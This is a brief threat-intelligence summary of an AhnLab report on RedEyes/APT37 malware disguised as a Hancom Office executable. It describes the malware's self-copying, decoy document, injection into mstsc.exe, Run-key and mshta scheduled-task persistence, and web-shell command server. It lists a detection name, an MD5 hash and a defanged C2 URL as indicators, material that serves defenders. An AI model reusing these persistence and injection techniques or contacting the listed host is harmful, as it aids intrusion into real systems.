AhnLab reports RedEyes/APT37-related malware distributed as a Hancom Office-like executable named “Who and What Threatens the World (Column).exe.” On execution it creates an AppData onedrivenew folder, copies itself as onedrivenew.exe, opens a decoy Hancom Office file, injects into mstsc.exe, deletes the original with cmd, and persists via a Run key and a scheduled task named OneDriveOp. The scheduled task uses mshta.exe every 60 minutes to reach a seemingly normal website that contains a web shell similar to prior RedEyes/APT37 infrastructure. AhnLab lists Trojan/Win.Agent.R580958, MD5 93fc0fb9b87a00b38f18c1cc4ee02e50, and hxxp://ingarchi.com/bbs/data/culture/getcfg.php as representative indicators.